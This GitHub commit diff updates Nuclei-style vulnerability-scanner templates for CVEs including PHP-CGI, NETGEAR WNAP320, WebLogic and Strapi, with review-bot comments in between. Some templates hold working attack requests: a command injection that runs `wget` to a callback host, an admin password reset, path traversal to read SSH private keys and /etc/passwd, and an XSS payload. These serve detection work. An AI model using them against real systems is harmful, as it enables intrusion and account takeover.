Dashboard Content Enhancements (#4031)

Dashboard Content Enhancements
patch-1
MostInterestingBotInTheWorld 2022-04-07 09:53:15 -04:00 committed by GitHub
parent a27f2048df
commit a24ef794b7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
50 changed files with 380 additions and 232 deletions

View File

@ -1,7 +1,7 @@
id: CVE-2012-1823
info:
name: PHP CGI v5.3.12/5.4.2 RCE
name: PHP CGI v5.3.12/5.4.2 Remote Code Execution
author: pikpikcu
severity: critical
reference:
@ -9,10 +9,9 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2012-1823
description: |
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case.
remediation: Upgrade to a supported version.
tags: rce,php,cve,cve2012
classification:
cve-id: CVE-2012-1823
tags: rce,php,cve,cve2012
requests:
- raw:
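Review bot: the `remediation: Upgrade to a supported version.` line is vaguer than the description directly above it, which already names the fixed releases (5.3.12 and 5.4.2); suggest `remediation: Upgrade to PHP 5.3.12 / 5.4.2 or later.` so the two fields agree.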
@ -25,7 +24,6 @@ requests:
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
@ -35,4 +33,4 @@ requests:
status:
- 200
# Enhanced by mp on 2022/02/18
# Enhanced by mp on 2022/04/04

View File

@ -2,11 +2,13 @@ id: CVE-2014-2321
info:
name: ZTE Cable Modem Web Shell
description: web_shell_cmd.gch on ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests, as demonstrated by using "set TelnetCfg" commands to enable a TELNET service with specified credentials.
description: |
ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests to web_shell_cmd.gch, as demonstrated by using "set TelnetCfg" commands to enable a TELNET service with specified credentials.
author: geeknik
reference:
- https://yosmelvin.wordpress.com/2017/09/21/f660-modem-hack/
- https://jalalsela.com/zxhn-h108n-router-web-shell-secrets/
- https://nvd.nist.gov/vuln/detail/CVE-2014-2321
severity: high
classification:
cve-id: CVE-2014-2321
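Review bot: subject-verb agreement in the new multi-line description: "ZTE F460 and F660 cable modems allows remote attackers" should read "allow", since the subject is plural; the replaced one-line description carried the same slip, so this rewrite is the place to fix it.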
@ -30,4 +32,4 @@ requests:
status:
- 200
# Enhanced by mp on 2022/03/31
# Enhanced by mp on 2022/04/01

View File

@ -0,0 +1,31 @@
id: CVE-2016-1555
info:
name: NETGEAR WNAP320 Access Point Firmware Remote Command Execution
author: gy741
severity: critical
description: NETGEAR WNAP320 Access Point Firmware version 2.0.3 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
reference:
- https://github.com/nobodyatall648/Netgear-WNAP320-Firmware-Version-2.0.3-RCE
- https://nvd.nist.gov/vuln/detail/CVE-2016-1555
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cve-id: CVE-2016-1555
cwe-id: CWE-77
tags: netgear,rce,oast,router
requests:
- raw:
- |
POST /boardDataWW.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23&reginfo=0&writeData=Submit
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
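Review bot: the tags line `tags: netgear,rce,oast,router` in this new file is missing the `cve,cve2016` tags that every other CVE template in this commit carries, so the template will not show up in cve-filtered runs; add them. The description also names the affected firmware (2.0.3) but not the affected endpoint, while the request targets /boardDataWW.php; mentioning it in the description helps triage.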

View File

@ -4,16 +4,18 @@ info:
name: Spring Security OAuth2 Remote Command Execution
author: princechaddha
severity: high
description: When processing authorization requests using the whitelabel views in Spring Security OAuth 2.0.0 to 2.0.9 and 1.0.0 to 1.0.5, the response_type parameter value was executed as Spring SpEL which enabled a malicious user to trigger remote code execution via the crafting of the value for response_type.
description: "Spring Security OAuth versions 2.0.0 to 2.0.9 and 1.0.0 to 1.0.5 contain a remote command execution vulnerability. When processing authorization requests using the whitelabel views, the response_type parameter value was executed as Spring SpEL which enabled a malicious user to trigger remote command execution via the crafting of the value for response_type."
remediation: Users of 1.0.x should not use whitelabel views for approval and error pages. Users of 2.0.x should either not use whitelabel views for approval and error pages or upgrade to 2.0.10 or later.
reference:
- https://github.com/vulhub/vulhub/blob/master/spring/CVE-2016-4977/README.md
- https://tanzu.vmware.com/security/cve-2016-4977
- https://nvd.nist.gov/vuln/detail/CVE-2016-4977
tags: cve,cve2016,spring,oauth2,oauth,rce,ssti
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.80
cve-id: CVE-2016-4977
cwe-id: CWE-19
tags: cve,cve2016,spring,oauth2,oauth,rce,ssti
requests:
- method: GET
@ -30,3 +32,5 @@ requests:
- type: status
status:
- 400
# Enhanced by mp on 2022/04/04

View File

@ -1,18 +1,20 @@
id: CVE-2017-10271
info:
name: CVE-2017-10271
name: Oracle WebLogic Server Component Remote Command Execution
author: dr_set
severity: high
description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.
description: The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security) is susceptible to component deserialization remote command execution. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Unauthenticated attackers with network access via T3 can leverage this vulnerability to compromise Oracle WebLogic Server.
reference:
- https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271
- https://github.com/SuperHacker-liuan/cve-2017-10271-poc
tags: cve,cve2017,rce,oracle,weblogic,oast
- https://www.oracle.com/security-alerts/cpuoct2017.html
- https://nvd.nist.gov/vuln/detail/CVE-2017-10271
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
cvss-score: 7.50
cve-id: CVE-2017-10271
tags: cve,cve2017,rce,oracle,weblogic,oast
requests:
- raw:
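Review bot: "is susceptible to component deserialization remote command execution" in the new description reads awkwardly; suggest "is susceptible to remote command execution via deserialization in the WLS Security subcomponent". Separately, the classification vector records C:N/I:N/A:H, which sits oddly beside a description of compromising the server and the `rce` tag; if that vector is the one published upstream, a short comment saying so would stop later contributors from "correcting" it.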
@ -59,3 +61,5 @@ requests:
- type: status
status:
- 500
# Enhanced by mp on 2022/04/05

View File

@ -1,19 +1,20 @@
id: CVE-2017-14535
info:
name: Trixbox - 2.8.0.4 OS Command Injection Vulnerability
name: Trixbox - 2.8.0.4 OS Command Injection
author: pikpikcu
severity: high
description: "Trixbox 2.8.0.4 is vulnerable to OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php."
reference:
- https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/
- https://www.exploit-db.com/exploits/49913
tags: cve,cve2017,trixbox,rce,injection
- https://nvd.nist.gov/vuln/detail/CVE-2017-14535
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.80
cve-id: CVE-2017-14535
cwe-id: CWE-78
description: "trixbox 2.8.0.4 has OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php."
tags: cve,cve2017,trixbox,rce,injection
requests:
- raw:
@ -36,3 +37,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/04/01

View File

@ -1,20 +1,20 @@
id: CVE-2017-14537
info:
name: trixbox 2.8.0 - directory-traversal
name: Trixbox 2.8.0 Path Traversal
author: pikpikcu
severity: medium
tags: cve,cve2017,trixbox,lfi
description: trixbox 2.8.0.4 has path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php.
description: "Trixbox 2.8.0.4 is susceptible to path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php."
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-14537
- https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/
- https://nvd.nist.gov/vuln/detail/CVE-2017-14537
- https://sourceforge.net/projects/asteriskathome/ # vendor homepage
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.50
cve-id: CVE-2017-14537
cwe-id: CWE-22
tags: cve,cve2017,trixbox,lfi
requests:
- raw:
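Review bot: the new name "Trixbox 2.8.0 Path Traversal" drops the patch level that the description ("Trixbox 2.8.0.4 is susceptible to path traversal") and the sibling template CVE-2017-14535 in this same commit use; make it "Trixbox 2.8.0.4 Path Traversal" so name and description agree.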
@ -47,3 +47,5 @@ requests:
regex:
- "root:.*:0:0:"
part: body
# Enhanced by mp on 2022/04/01

View File

@ -3,9 +3,8 @@ id: CVE-2017-3506
info:
name: Oracle Weblogic Remote OS Command Execution
author: pdteam
description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server.
description: The Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2 is susceptible to a difficult to exploit vulnerability that could allow unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server.
severity: high
tags: cve,cve2017,weblogic,oracle,rce,oast
reference:
- https://hackerone.com/reports/810778
- https://nvd.nist.gov/vuln/detail/CVE-2017-3506
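Review bot: "a difficult to exploit vulnerability" in the new description wants hyphens ("a difficult-to-exploit vulnerability"). Also, the name promises "Remote OS Command Execution" and the tags say `rce`, yet the description only says "compromise Oracle WebLogic Server"; consider stating the command-execution impact in the description as well.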
@ -13,6 +12,7 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 7.40
cve-id: CVE-2017-3506
tags: cve,cve2017,weblogic,oracle,rce,oast
requests:
- raw:
@ -44,3 +44,5 @@ requests:
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# Enhanced by mp on 2022/04/05

View File

@ -1,17 +1,19 @@
id: CVE-2017-6090
info:
name: PhpCollab (unauthenticated) Arbitrary File Upload
name: PhpColl 2.5.1 Arbitrary File Upload
author: pikpikcu
severity: high
tags: cve,cve2017,phpcollab,rce,fileupload
reference: https://nvd.nist.gov/vuln/detail/CVE-2017-6090
reference:
- https://sysdream.com/news/lab/2017-09-29-cve-2017-6090-phpcollab-2-5-1-arbitrary-file-upload-unauthenticated/
- https://nvd.nist.gov/vuln/detail/CVE-2017-6090
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.80
cve-id: CVE-2017-6090
cwe-id: CWE-434
description: "Unrestricted file upload vulnerability in clients/editclient.php in PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/."
description: "PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/ via clients/editclient.php."
tags: cve,cve2017,phpcollab,rce,fileupload
requests:
- raw:
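Review bot: typo in the new name: "PhpColl 2.5.1 Arbitrary File Upload" should read "PhpCollab", matching the description, the `phpcollab` tag and the sysdream reference URL. Also worth a second look: the sysdream URL says "unauthenticated" and the replaced name said "(unauthenticated)", while both descriptions and the PR:L vector say "remote authenticated users"; the new name sidesteps the question, but the description should say which it is.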
@ -42,3 +44,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/04/06

View File

@ -1,19 +1,20 @@
id: CVE-2018-14728
info:
name: Responsive filemanager 9.13.1 - SSRF/LFI
name: Responsive filemanager 9.13.1 Server-Side Request Forgery
author: madrobot
severity: critical
tags: cve,cve2018,ssrf,lfi
description: "Responsive filemanager 9.13.1 is susceptible to server-side request forgery in upload.php via the url parameter."
reference:
- http://packetstormsecurity.com/files/148742/Responsive-Filemanager-9.13.1-Server-Side-Request-Forgery.html
- https://www.exploit-db.com/exploits/45103/
- https://nvd.nist.gov/vuln/detail/CVE-2018-14728
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2018-14728
cwe-id: CWE-918
description: "upload.php in Responsive FileManager 9.13.1 allows SSRF via the url parameter."
reference:
- http://packetstormsecurity.com/files/148742/Responsive-Filemanager-9.13.1-Server-Side-Request-Forgery.html
- https://www.exploit-db.com/exploits/45103/
tags: cve,cve2018,ssrf,lfi
requests:
- method: POST
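Review bot: the rename drops "/LFI" from the name while the `lfi` tag is kept and the matcher in the next hunk still looks for `root:.*:0:0:` in the body, i.e. the template proves a local file read, not merely an outbound request; suggest the description say that the SSRF in upload.php is used to read local files, so name, tags and matcher line up. Minor: the name writes "Responsive filemanager" where the replaced description and the packetstorm reference title write "Responsive FileManager".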
@ -27,3 +28,5 @@ requests:
regex:
- "root:.*:0:0:"
part: body
# Enhanced by mp on 2022/04/01

View File

@ -1,18 +1,19 @@
id: CVE-2018-15517
info:
name: D-LINK Central WifiManager - SSRF
description: Using a web browser or script SSRF can be initiated against internal/external systems to conduct port scans by leveraging D LINKs MailConnect component. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, leading to SSRF, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using Web Browser.
name: D-LINK Central WifiManager Server-Side Request Forgery
description: "D-LINK Central WifiManager is susceptible to server-side request forgery. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using a browser."
reference:
- http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15517
author: gy741
severity: high
tags: cve,cve2018,dlink,ssrf,oast
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N
cvss-score: 8.60
cve-id: CVE-2018-15517
cwe-id: CWE-918
tags: cve,cve2018,dlink,ssrf,oast
requests:
- method: GET
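Review bot: the new description still ends with the informal "This can undermine accountability of where scan or connections actually came from and or bypass the FW etc."; suggest "This can obscure the true origin of scans or connections and bypass firewall restrictions." The reference list also points at cve.mitre.org where the rest of this commit adds the nvd.nist.gov detail page; consider adding it for consistency.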
@ -24,3 +25,5 @@ requests:
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# Enhanced by mp on 2022/04/06

View File

@ -1,10 +1,10 @@
id: CVE-2018-2791
info:
name: Oracle WebCenter Sites Multiple XSS
name: Oracle WebCenter Sites Cross-Site Scripting
author: madrobot,leovalcante
severity: high
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware.
description: The Oracle WebCenter Sites component of Oracle Fusion Middleware is susceptible to multiple instances of cross-site scripting that could allow unauthenticated attackers with network access via HTTP to compromise Oracle WebCenter Sites. Impacted versions that are affected are 11.1.1.8.0, 12.2.1.2.0 and 12.2.1.3.0. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle WebCenter Sites, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data as well as unauthorized update, insert or delete access to some of Oracle WebCenter Sites accessible data.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
cvss-score: 8.20
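Review bot: "Impacted versions that are affected are 11.1.1.8.0, 12.2.1.2.0 and 12.2.1.3.0" in the new description is redundant; use "Supported versions that are affected are ...", the phrasing the other Oracle templates in this commit use, or simply "Affected versions are ...".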
@ -15,6 +15,7 @@ info:
- http://www.securityfocus.com/bid/103800
- https://www.exploit-db.com/exploits/44752/
- https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
- https://nvd.nist.gov/vuln/detail/CVE-2018-2791
tags: cve,cve2018,oracle,xss,wcs
requests:
@ -40,4 +41,6 @@ requests:
words:
- '<script>alert(24)</script>'
- 'Missing translation key'
condition: and
condition: and
# Enhanced by mp on 2022/04/06

View File

@ -1,20 +1,21 @@
id: CVE-2018-7490
info:
name: uWSGI PHP Plugin Directory Traversal
name: uWSGI PHP Plugin Local File Inclusion
author: madrobot
severity: high
tags: cve,cve2018,uwsgi,php,lfi,plugin
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2018-7490
cwe-id: CWE-22
description: "uWSGI before 2.0.17 mishandles a DOCUMENT_ROOT check during use of the --php-docroot option, allowing directory traversal."
description: "uWSGI PHP Plugin before 2.0.17 mishandles a DOCUMENT_ROOT check during use of the --php-docroot option, making it susceptible to local file inclusion."
reference:
- https://uwsgi-docs.readthedocs.io/en/latest/Changelog-2.0.17.html
- https://www.exploit-db.com/exploits/44223/
- https://www.debian.org/security/2018/dsa-4142
- https://nvd.nist.gov/vuln/detail/CVE-2018-7490
tags: cve,cve2018,uwsgi,php,lfi,plugin
requests:
- method: GET
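Review bot: renaming "Directory Traversal" to "Local File Inclusion" sits awkwardly next to `cwe-id: CWE-22` (path traversal) and the replaced description's "allowing directory traversal"; the matcher in the next hunk reads /etc/passwd content, which either label covers, but keeping "Directory Traversal" in the name or at least in the description keeps the template aligned with its CWE.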
@ -30,3 +31,5 @@ requests:
regex:
- "root:.*:0:0:"
part: body
# Enhanced by mp on 2022/04/01

View File

@ -1,14 +1,16 @@
id: CVE-2019-13392
info:
name: MindPalette NateMail 3.0.15 - (XSS)
name: MindPalette NateMail 3.0.15 Cross-Site Scripting
author: pikpikcu
severity: medium
description: reflected Cross-Site Scripting (XSS) vulnerability in MindPalette NateMail 3.0.15 allows an attacker to execute remote JavaScript in a victim's browser via a specially crafted POST request. The application will reflect the recipient value if it is not in the NateMail recipient array. Note that this array is keyed via integers by default, so any string input will be invalid.
description: MindPalette NateMail 3.0.15 is susceptible to reflected cross-site scripting which could allows an attacker to execute remote JavaScript in a victim's browser via a specially crafted POST request. The application will reflect the recipient value if it is not in the NateMail recipient array. Note that this array is keyed via integers by default, so any string input will be invalid.
reference:
- https://www.doyler.net/security-not-included/natemail-vulnerabilities
- https://mindpalette.com/tag/natemail/
- https://nvd.nist.gov/vuln/detail/CVE-2019-13392
tags: cve,cve2019,natemail,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
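Review bot: grammar in the new description: "which could allows an attacker to execute remote JavaScript" should be "which could allow an attacker to execute remote JavaScript".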
@ -37,3 +39,5 @@ requests:
part: header
words:
- text/html
# Enhanced by mp on 2022/04/04

View File

@ -1,20 +1,20 @@
id: CVE-2019-18818
info:
name: Strapi CMS - Admin password reset (Unauthenticated)
name: strapi CMS Unauthenticated Admin Password Reset
author: idealphase
description: strapi before 3.0.0-beta.17.5 mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js.
severity: critical
description: "strapi CMS before 3.0.0-beta.17.5 mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js."
reference:
- https://github.com/advisories/GHSA-6xc2-mj39-q599
- https://www.exploit-db.com/exploits/50239
- https://nvd.nist.gov/vuln/detail/CVE-2019-18818
severity: critical
tags: cve,cve2019,strapi,auth-bypass,intrusive
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2019-18818
cwe-id: CWE-640
tags: cve,cve2019,strapi,auth-bypass,intrusive
requests:
- raw:
@ -23,9 +23,7 @@ requests:
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/json
{"code": {"$gt": 0}, "password": "SuperStrongPassword1", "passwordConfirmation": "SuperStrongPassword1"}
matchers-condition: and
matchers:
- type: status
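Review bot: the request body in this hunk sets the target's admin password to "SuperStrongPassword1", which is why the template carries the `intrusive` tag; since the change touches this request, consider stating that side effect in the description or remediation so operators know that a successful run changes credentials on a vulnerable instance.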
@ -49,4 +47,6 @@ requests:
- type: json
json:
- .user.username
- .user.email
- .user.email
# Enhanced by mp on 2022/04/01

View File

@ -1,17 +1,18 @@
id: CVE-2019-2578
info:
name: Broken Access Control Oracle WebCenter Sites
name: Oracle WebCenter Sites Broken Access Control
author: leovalcante
severity: high
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. The supported version that is affected is 12.2.1.3.0. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data.
reference: https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
tags: cve,cve2019,oracle,wcs,auth-bypass
description: "Oracle WebCenter Sites 12.2.1.3.0 (a component of Oracle Fusion Middleware) suffers from broken access control. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data."
reference:
- https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
- https://nvd.nist.gov/vuln/detail/CVE-2019-2578
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.60
cve-id: CVE-2019-2578
tags: cve,cve2019,oracle,wcs,auth-bypass
requests:
- raw:
@ -28,4 +29,6 @@ requests:
- type: regex
part: body
regex:
- '<script[\d\D]*<throwexception/>'
- '<script[\d\D]*<throwexception/>'
# Enhanced by mp on 2022/04/06

View File

@ -1,11 +1,11 @@
id: CVE-2019-6715
info:
name: CVE-2019-6715
name: W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated File Read / Directory Traversal
author: randomrobbie
severity: high
description: W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated Arbitrary File Read / SSRF
tags: cve,cve2019,wordpress,wp-plugin,ssrf
description: |
WordPress plugin W3 Total Cache before version 0.9.4 allows remote attackers to read arbitrary files via the SubscribeURL field in SubscriptionConfirmation JSON data via pub/sns.php.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
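Review bot: the new name says "Unauthenticated File Read / Directory Traversal" and the new description says "read arbitrary files via the SubscribeURL field", while the tags still read `ssrf` (inherited from the replaced "Arbitrary File Read / SSRF" description); either add `lfi` alongside `ssrf`, as the other file-read templates in this commit are tagged, or keep SSRF in the name so the two agree.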
@ -13,6 +13,8 @@ info:
reference:
- https://vinhjaxt.github.io/2019/03/cve-2019-6715
- http://packetstormsecurity.com/files/160674/WordPress-W3-Total-Cache-0.9.3-File-Read-Directory-Traversal.html
- https://nvd.nist.gov/vuln/detail/CVE-2019-6715
tags: cve,cve2019,wordpress,wp-plugin,ssrf
requests:
- raw:
@ -27,4 +29,6 @@ requests:
- type: word
words:
- "TmVzc3VzQ29kZUV4ZWNUZXN0"
part: body
part: body
# Enhanced by mp on 2022/04/05

View File

@ -4,15 +4,17 @@ info:
name: Apache Cocoon 2.1.12 XML Injection
author: pikpikcu
severity: high
tags: cve,cve2020,apache,xml,cocoon,xxe
description: When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used to access any file on the server system.
remediation: Upgrade to Apache Cocon 2.1.13 or later.
reference: https://lists.apache.org/thread.html/r77add973ea521185e1a90aca00ba9dae7caa8d8b944d92421702bb54%40%3Cusers.cocoon.apache.org%3E
description: Apache Cocoon 2.1.12 is susceptible to XML injection. When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used to access any file on the server system.
remediation: Upgrade to Apache Cocoon 2.1.13 or later.
reference:
- https://lists.apache.org/thread/6xg5j4knfczwdhggo3t95owqzol37k1b
- https://nvd.nist.gov/vuln/detail/CVE-2020-11991
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2020-11991
cwe-id: CWE-611
tags: cve,cve2020,apache,xml,cocoon,xxe
requests:
- method: POST
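Review bot: "XML injection" in the name and the new description understates what `cwe-id: CWE-611` and the `xxe` tag record, and what the description itself says ("including external system entities, can be used to access any file on the server"); suggest "XML External Entity Injection". The remediation typo fix ("Cocon" to "Cocoon") is good; since the URL-encoded lists.apache.org reference was replaced rather than kept, please confirm the new thread URL resolves.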
@ -39,4 +41,4 @@ requests:
status:
- 200
# Enhanced by cs on 2022/02/25
# Enhanced by mp on 2022/04/05

View File

@ -4,14 +4,17 @@ info:
name: Unauthenticated Zoho ManageEngine OpManger Arbitrary File Read
author: dwisiswant0
severity: high
description: Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a crafted request.
tags: cve,cve2020,zoho,lfi,manageengine
reference: https://github.com/BeetleChunks/CVE-2020-12116
description: Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a specially crafted request.
reference:
- https://github.com/BeetleChunks/CVE-2020-12116
- https://nvd.nist.gov/vuln/detail/CVE-2020-12116
- https://www.manageengine.com/network-monitoring/help/read-me-complete.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2020-12116
cwe-id: CWE-22
tags: cve,cve2020,zoho,lfi,manageengine
requests:
- raw:
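Review bot: the name line, kept as context at the top of this hunk, still has "OpManger" for "OpManager" (the description spells it correctly); since the neighbouring fields are rewritten here, fix the typo in the same change.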
@ -22,7 +25,7 @@ requests:
Connection: close
- |
GET §endpoint§../../../../bin/.ssh_host_rsa_key HTTP/1.1
GET {{endpoint}}../../../../bin/.ssh_host_rsa_key HTTP/1.1
Host: {{Hostname}}
Accept: */*
Cache-Control: max-age=0
@ -44,3 +47,5 @@ requests:
- 'contains(body_2, "BEGIN RSA PRIVATE KEY")'
- 'status_code_2 == 200'
condition: and
# Enhanced by mp on 2022/04/04

View File

@ -1,17 +1,19 @@
id: CVE-2020-12720
info:
name: CVE-2020-12720 vBulletin SQLI
name: vBulletin SQL Injection
author: pdteam
severity: critical
description: vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control.
reference: https://github.com/rekter0/exploits/tree/master/CVE-2020-12720
tags: cve,cve2020,vbulletin,sqli
description: vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control that permits SQL injection attacks.
reference:
- https://github.com/rekter0/exploits/tree/master/CVE-2020-12720
- https://nvd.nist.gov/vuln/detail/CVE-2020-12720
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2020-12720
cwe-id: CWE-89,CWE-306
tags: cve,cve2020,vbulletin,sqli
requests:
- raw:
@ -28,3 +30,5 @@ requests:
- type: word
words:
- "vbulletinrce"
# Enhanced by mp on 2022/04/01

View File

@ -1,16 +1,18 @@
id: CVE-2020-14883
info:
name: Oracle WebLogic Server Administration Console Handle RCE
name: Oracle WebLogic Server Administration Console Remote Code Execution
author: pdteam
severity: high
description: Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attackers with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14883
tags: cve,cve2020,oracle,rce,weblogic
description: The Oracle Fusion Middleware WebLogic Server admin console in versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 is vulnerable to an easily exploitable vulnerability that allows high privileged attackers with network access via HTTP to compromise Oracle WebLogic Server.
reference:
- https://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14883
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.20
cve-id: CVE-2020-14883
tags: cve,cve2020,oracle,rce,weblogic
requests:
- method: POST
